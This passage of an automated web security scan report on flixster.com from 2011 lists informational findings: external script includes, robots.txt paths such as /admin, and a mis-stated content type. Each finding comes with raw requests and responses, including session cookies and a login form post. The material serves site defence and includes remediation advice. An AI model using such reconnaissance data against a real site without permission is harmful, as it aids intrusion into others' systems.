           <a href="/sitemap/movies">Movies</a> |
           <a href="/sitemap/actors">Actors &amp; Actresses</a> |
           <a href="/sitemap/photos">Photos</a> |
           <a href="/sitemap/theaters">Theaters</a> |
           <a href="/sitemap/news">News</a> |
           <a href="/sitemap/movie-lists">Lists</a> |
           <a href="/sitemap/quizzes">Quizzes</a> |
           <a href="/best">Best Movies</a> |
           <a href="/blog">Blog</a> |
           <a href="/sitemap/reviews">Reviews</a> |
           <a href="/wap/apps">Mobile</a>
       </p>
       
       <p>
           <strong>More Info</strong> |
           <a rel="nofollow" title="Flixster Copyrights, Privacy Policy, Terms of Service" href="/misc/copyrightprivacyterms">Copyright, Privacy Policy, Terms of Service</a> |
           <a rel="nofollow" title="About Flixster" href="/about">About Us</a> |
           <a rel="nofollow" title="Jobs at Flixster" href="/misc/jobs">Jobs</a> |
           <a rel="nofollow" title="Advertise on Flixster" href="/about/advertise">Advertise</a> |
    <a href="http://www.twitter.com/flixster">Follow Flixster on Twitter!</a> |
           <a rel="nofollow" title="Flixster SuperReviewers" href="/support/topic/superreviewers">Flixster SuperReviewers</a>
           
   
       </p>
       
       <p>
           <strong>Help</strong> |
           <a title="Sitemap" href="/sitemap">Sitemap</a> |
           <a rel="nofollow" title="Help" href="http://flixster.assistly.com/customer/portal/topics/29973-flixster-com/articles" target="_blank">Help</a>
       </p>
       
       <p class="pageCopyright">Copyright &copy; 2010 Flixster, All Rights Reserved <a href="/misc/trademark">Trademark Use Guidelines</a></p>
       
       <p><a title="Get Skyfire - Browse the PC web on your phone" href="http://get.skyfire.com/">Get Skyfir
...[SNIP]...

6. Cross-domain script include  previous  next
There are 4 instances of this issue:

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.


6.1. http://www.flixster.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.flixster.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.flixster.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Date: Thu, 18 Aug 2011 10:39:52 GMT
Server: Apache
Expires: Sat, 6 May 1995 12:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Language: en
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Type: text/html;charset=ISO-8859-1


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmln
...[SNIP]...
ref="http://static.flixstercdn.com/static/v/cust20110815abc/styles/pages.home.visitor.css" type="text/css" rel="stylesheet"/>
               
               
                                                                                                                                               <script type="text/javascript" src="http://static.flixstercdn.com/static/v/cust20110815abc/scripts/prototype.6.js" charset="utf-8"></script>
               
               
                                                                                       <script type="text/javascript" src="http://static.flixstercdn.com/static/v/cust20110815abc/scripts/scriptaculous.8.js" charset="utf-8"></script>
               
               
                                                                                       <script type="text/javascript" src="http://static.flixstercdn.com/static/v/cust20110815abc/scripts/firebugx.js" charset="utf-8"></script>
               
               
                                                                                       <script type="text/javascript" src="http://static.flixstercdn.com/static/v/cust20110815abc/scripts/global.js" charset="utf-8"></script>
               
               
                                                                                       <script type="text/javascript" src="http://static.flixstercdn.com/static/v/cust20110815abc/scripts/apis.js" charset="utf-8"></script>
               
               
                                                                                       <script type="text/javascript" src="http://static.flixstercdn.com/static/v/cust20110815abc/scripts/balloon.js" charset="utf-8"></script>
               
               
                                                                                       <script type="text/javascript" src="http://static.flixstercdn.com/static/v/cust20110815abc/scripts/talk.js" charset="utf-8"></script>
               
               
                                                                                       <script type="text/javascript" src="http://static.flixstercdn.com/static/v/cust20110815abc/scripts/search.js" charset="utf-8"></script>
               
               
                                                                                       <script type="text/javascript" src="http://static.flixstercdn.com/static/v/cust20110815abc/scripts/widgets.captcha.js" charset="utf-8"></script>
               
               
                                                                                       <script type="text/javascript" src="http://static.flixstercdn.com/static/v/cust20110815abc/scripts/tracking.flixster.js" charset="utf-8"></script>
               
               
                                                                                                                           <script type="text/javascript" src="http://static.flixstercdn.com/static/v/cust20110815abc/scripts/pages.home.js" charset="utf-8"></script>
               
               
                                                                                       <script type="text/javascript" src="http://static.flixstercdn.com/static/v/cust20110815abc/scripts/rating.js" charset="utf-8"></script>
...[SNIP]...
<li><script type="text/javascript" src="http://ctbdev.net/customers/flix/modified_2go/StandAlone.js"></script>
...[SNIP]...
<!-- COPYRIGHT 2010 Nielsen Online -->
   <script type="text/javascript" src="//secure-us.imrworldwide.com/v60.js"></script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://pixel.quantserve.com/api/segments.json?a=p-0fuRlG_jy3lfA&callback=qc_results" ></script>
...[SNIP]...

6.2. http://www.flixster.com/people/meet  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.flixster.com
Path:   /people/meet

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /people/meet HTTP/1.1
Host: www.flixster.com
Proxy-Connection: keep-alive
Referer: http://www.flixster.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ServerID=1212; JSESSIONID=8F25DA58E826E87274AB123E98E4E0EC.localhost; __qca=P0-1612527485-1313664016809; __utmz=1.1313664010.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.456048224.1313664010.1313664010.1313664010.1; __utmc=1; __utmv=1.Default; __utmb=1.1.10.1313664010; qcs=qcs%3DD%3Bqcs%3DT%3Bqcs%3D6384%3Bqcs%3D5913%3Bqcs%3D5076%3Bqcs%3D4058%3Bqcs%3D3940%3Bqcs%3D2738%3Bqcs%3D2735%3Bqcs%3D2731%3Bqcs%3D2728%3Bqcs%3D2726%3Bqcs%3D2725%3Bqcs%3D2722%3Bqcs%3D2720

Response

HTTP/1.0 200 OK
Date: Thu, 18 Aug 2011 10:41:21 GMT
Server: Apache
Expires: Sat, 6 May 1995 12:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Language: en
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Type: text/html;charset=ISO-8859-1


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns
...[SNIP]...
/static.flixstercdn.com/static/v/cust20110815abc/styles/ads.css" type="text/css" rel="stylesheet"/>
               
               
                                                                                                                                                                                   <script type="text/javascript" src="http://static.flixstercdn.com/static/v/cust20110815abc/scripts/prototype.6.js" charset="utf-8"></script>
               
               
                                                                                       <script type="text/javascript" src="http://static.flixstercdn.com/static/v/cust20110815abc/scripts/scriptaculous.8.js" charset="utf-8"></script>
               
               
                                                                                       <script type="text/javascript" src="http://static.flixstercdn.com/static/v/cust20110815abc/scripts/firebugx.js" charset="utf-8"></script>
               
               
                                                                                       <script type="text/javascript" src="http://static.flixstercdn.com/static/v/cust20110815abc/scripts/global.js" charset="utf-8"></script>
               
               
                                                                                       <script type="text/javascript" src="http://static.flixstercdn.com/static/v/cust20110815abc/scripts/apis.js" charset="utf-8"></script>
               
               
                                                                                       <script type="text/javascript" src="http://static.flixstercdn.com/static/v/cust20110815abc/scripts/balloon.js" charset="utf-8"></script>
               
               
                                                                                       <script type="text/javascript" src="http://static.flixstercdn.com/static/v/cust20110815abc/scripts/talk.js" charset="utf-8"></script>
               
               
                                                                                       <script type="text/javascript" src="http://static.flixstercdn.com/static/v/cust20110815abc/scripts/search.js" charset="utf-8"></script>
               
               
                                                                                       <script type="text/javascript" src="http://static.flixstercdn.com/static/v/cust20110815abc/scripts/widgets.captcha.js" charset="utf-8"></script>
               
               
                                                                                       <script type="text/javascript" src="http://static.flixstercdn.com/static/v/cust20110815abc/scripts/tracking.flixster.js" charset="utf-8"></script>
...[SNIP]...
<!-- COPYRIGHT 2010 Nielsen Online -->
   <script type="text/javascript" src="//secure-us.imrworldwide.com/v60.js"></script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://pixel.quantserve.com/api/segments.json?a=p-0fuRlG_jy3lfA&callback=qc_results" ></script>
...[SNIP]...

6.3. http://www.flixster.com/sitemap/photos  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.flixster.com
Path:   /sitemap/photos

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /sitemap/photos HTTP/1.1
Host: www.flixster.com
Proxy-Connection: keep-alive
Referer: http://www.flixster.com/userAuth.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ServerID=1212; JSESSIONID=8F25DA58E826E87274AB123E98E4E0EC.localhost; __qca=P0-1612527485-1313664016809; __utmz=1.1313664010.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.456048224.1313664010.1313664010.1313664010.1; __utmc=1; __utmv=1.Default; qcs=qcs%3DD%3Bqcs%3DT%3Bqcs%3D6384%3Bqcs%3D5913%3Bqcs%3D5076%3Bqcs%3D4058%3Bqcs%3D3940%3Bqcs%3D2738%3Bqcs%3D2735%3Bqcs%3D2731%3Bqcs%3D2728%3Bqcs%3D2726%3Bqcs%3D2725%3Bqcs%3D2722%3Bqcs%3D2720

Response

HTTP/1.0 200 OK
Date: Thu, 18 Aug 2011 11:34:24 GMT
Server: Apache
Expires: Sat, 6 May 1995 12:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Language: en
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Type: text/html;charset=ISO-8859-1


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns
...[SNIP]...
ink href="http://static.flixstercdn.com/static/v/cust20110815abc/styles/pages.sitemap.css" type="text/css" rel="stylesheet"/>
               
               
                                                                                                                                               <script type="text/javascript" src="http://static.flixstercdn.com/static/v/cust20110815abc/scripts/prototype.6.js" charset="utf-8"></script>
               
               
                                                                                       <script type="text/javascript" src="http://static.flixstercdn.com/static/v/cust20110815abc/scripts/scriptaculous.8.js" charset="utf-8"></script>
               
               
                                                                                       <script type="text/javascript" src="http://static.flixstercdn.com/static/v/cust20110815abc/scripts/firebugx.js" charset="utf-8"></script>
               
               
                                                                                       <script type="text/javascript" src="http://static.flixstercdn.com/static/v/cust20110815abc/scripts/global.js" charset="utf-8"></script>
               
               
                                                                                       <script type="text/javascript" src="http://static.flixstercdn.com/static/v/cust20110815abc/scripts/apis.js" charset="utf-8"></script>
               
               
                                                                                       <script type="text/javascript" src="http://static.flixstercdn.com/static/v/cust20110815abc/scripts/balloon.js" charset="utf-8"></script>
               
               
                                                                                       <script type="text/javascript" src="http://static.flixstercdn.com/static/v/cust20110815abc/scripts/talk.js" charset="utf-8"></script>
               
               
                                                                                       <script type="text/javascript" src="http://static.flixstercdn.com/static/v/cust20110815abc/scripts/search.js" charset="utf-8"></script>
               
               
                                                                                       <script type="text/javascript" src="http://static.flixstercdn.com/static/v/cust20110815abc/scripts/widgets.captcha.js" charset="utf-8"></script>
               
               
                                                                                       <script type="text/javascript" src="http://static.flixstercdn.com/static/v/cust20110815abc/scripts/tracking.flixster.js" charset="utf-8"></script>
...[SNIP]...
<!-- COPYRIGHT 2010 Nielsen Online -->
   <script type="text/javascript" src="//secure-us.imrworldwide.com/v60.js"></script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://pixel.quantserve.com/api/segments.json?a=p-0fuRlG_jy3lfA&callback=qc_results" ></script>
...[SNIP]...

6.4. http://www.flixster.com/userAuth.do  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.flixster.com
Path:   /userAuth.do

Issue detail

The response dynamically includes the following scripts from other domains:

Request

POST /userAuth.do HTTP/1.1
Host: www.flixster.com
Proxy-Connection: keep-alive
Referer: http://www.flixster.com/people/meet
Content-Length: 138
Cache-Control: max-age=0
Origin: http://www.flixster.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ServerID=1212; JSESSIONID=8F25DA58E826E87274AB123E98E4E0EC.localhost; __qca=P0-1612527485-1313664016809; __utmz=1.1313664010.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.456048224.1313664010.1313664010.1313664010.1; __utmc=1; __utmv=1.Default; __utmb=1.2.10.1313664010; qcs=qcs%3DD%3Bqcs%3DT%3Bqcs%3D6384%3Bqcs%3D5913%3Bqcs%3D5076%3Bqcs%3D4058%3Bqcs%3D3940%3Bqcs%3D2738%3Bqcs%3D2735%3Bqcs%3D2731%3Bqcs%3D2728%3Bqcs%3D2726%3Bqcs%3D2725%3Bqcs%3D2722%3Bqcs%3D2720

userauthAction=doLogin&redirectTarget=%2Fpeople%2Fmeet&userauthEmail=ss&userauthPassword=&userauthRemember=on&submit=Login+to+Flixster+%3E

Response

HTTP/1.0 200 OK
Date: Thu, 18 Aug 2011 10:41:31 GMT
Server: Apache
Expires: Sat, 6 May 1995 12:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Access-Control-Allow-Origin: http://www.flixster.com
Access-Control-Allow-Credentials: true
Content-Language: en
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Type: text/html;charset=ISO-8859-1


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns
...[SNIP]...
/static.flixstercdn.com/static/v/cust20110815abc/styles/ads.css" type="text/css" rel="stylesheet"/>
               
               
                                                                                                                                                                                   <script type="text/javascript" src="http://static.flixstercdn.com/static/v/cust20110815abc/scripts/prototype.6.js" charset="utf-8"></script>
               
               
                                                                                       <script type="text/javascript" src="http://static.flixstercdn.com/static/v/cust20110815abc/scripts/scriptaculous.8.js" charset="utf-8"></script>
               
               
                                                                                       <script type="text/javascript" src="http://static.flixstercdn.com/static/v/cust20110815abc/scripts/firebugx.js" charset="utf-8"></script>
               
               
                                                                                       <script type="text/javascript" src="http://static.flixstercdn.com/static/v/cust20110815abc/scripts/global.js" charset="utf-8"></script>
               
               
                                                                                       <script type="text/javascript" src="http://static.flixstercdn.com/static/v/cust20110815abc/scripts/apis.js" charset="utf-8"></script>
               
               
                                                                                       <script type="text/javascript" src="http://static.flixstercdn.com/static/v/cust20110815abc/scripts/balloon.js" charset="utf-8"></script>
               
               
                                                                                       <script type="text/javascript" src="http://static.flixstercdn.com/static/v/cust20110815abc/scripts/talk.js" charset="utf-8"></script>
               
               
                                                                                       <script type="text/javascript" src="http://static.flixstercdn.com/static/v/cust20110815abc/scripts/search.js" charset="utf-8"></script>
               
               
                                                                                       <script type="text/javascript" src="http://static.flixstercdn.com/static/v/cust20110815abc/scripts/widgets.captcha.js" charset="utf-8"></script>
               
               
                                                                                       <script type="text/javascript" src="http://static.flixstercdn.com/static/v/cust20110815abc/scripts/tracking.flixster.js" charset="utf-8"></script>
...[SNIP]...
<!-- COPYRIGHT 2010 Nielsen Online -->
   <script type="text/javascript" src="//secure-us.imrworldwide.com/v60.js"></script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://pixel.quantserve.com/api/segments.json?a=p-0fuRlG_jy3lfA&callback=qc_results" ></script>
...[SNIP]...

7. Robots.txt file  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.flixster.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Issue background

The file robots.txt is used to give instructions to web robots, such as search engine crawlers, about locations within the web site which robots are allowed, or not allowed, to crawl and index.

The presence of the robots.txt does not in itself present any kind of security vulnerability. However, it is often used to identify restricted or private areas of a site's contents. The information in the file may therefore help an attacker to map out the site's contents, especially if some of the locations identified are not linked from elsewhere in the site. If the application relies on robots.txt to protect access to these areas, and does not enforce proper access control over them, then this presents a serious vulnerability.

Issue remediation

The robots.txt file is not itself a security threat, and its correct use can represent good practice for non-security reasons. You should not assume that all web robots will honour the file's instructions. Rather, assume that attackers will pay close attention to any locations identified in the file. Do not rely on robots.txt to provide any kind of protection over unauthorised access.

Request

GET /robots.txt HTTP/1.0
Host: www.flixster.com

Response

HTTP/1.0 200 OK
Date: Thu, 18 Aug 2011 10:39:53 GMT
Server: Apache
Last-Modified: Mon, 15 Aug 2011 19:09:33 GMT
ETag: "36c"
Accept-Ranges: bytes
Content-Length: 876
Cache-Control: max-age=86400
Expires: Fri, 19 Aug 2011 10:39:53 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain; charset=UTF-8

User-Agent: *
Disallow: /account
Disallow: /actor/random
Disallow: /admin
Disallow: /address-book
Disallow: /api
Disallow: /bebo
Disallow: /captcha
Disallow: /converse.do
Disallow: /DoNotSend.jsp
Disa
...[SNIP]...

8. Content type incorrectly stated  previous

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.flixster.com
Path:   /misc/service/lsrc-track

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Issue background

If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.

Request

POST /misc/service/lsrc-track HTTP/1.1
Host: www.flixster.com
Proxy-Connection: keep-alive
Referer: http://www.flixster.com/
Content-Length: 22
Origin: http://www.flixster.com
X-Prototype-Version: 1.6.0.2
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Content-type: application/x-www-form-urlencoded; charset=UTF-8
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ServerID=1212; JSESSIONID=8F25DA58E826E87274AB123E98E4E0EC.localhost; __qca=P0-1612527485-1313664016809

lsrc=TypeAhead-Init&_=

Response

HTTP/1.0 200 OK
Date: Thu, 18 Aug 2011 10:40:11 GMT
Server: Apache
Expires: Sat, 6 May 1995 12:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Access-Control-Allow-Origin: http://www.flixster.com
Access-Control-Allow-Credentials: true
Content-Language: en
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Type: text/html;charset=ISO-8859-1


success

new page success

Report generated by XSS.CX at Thu Aug 18 06:10:01 GMT-06:00 2011.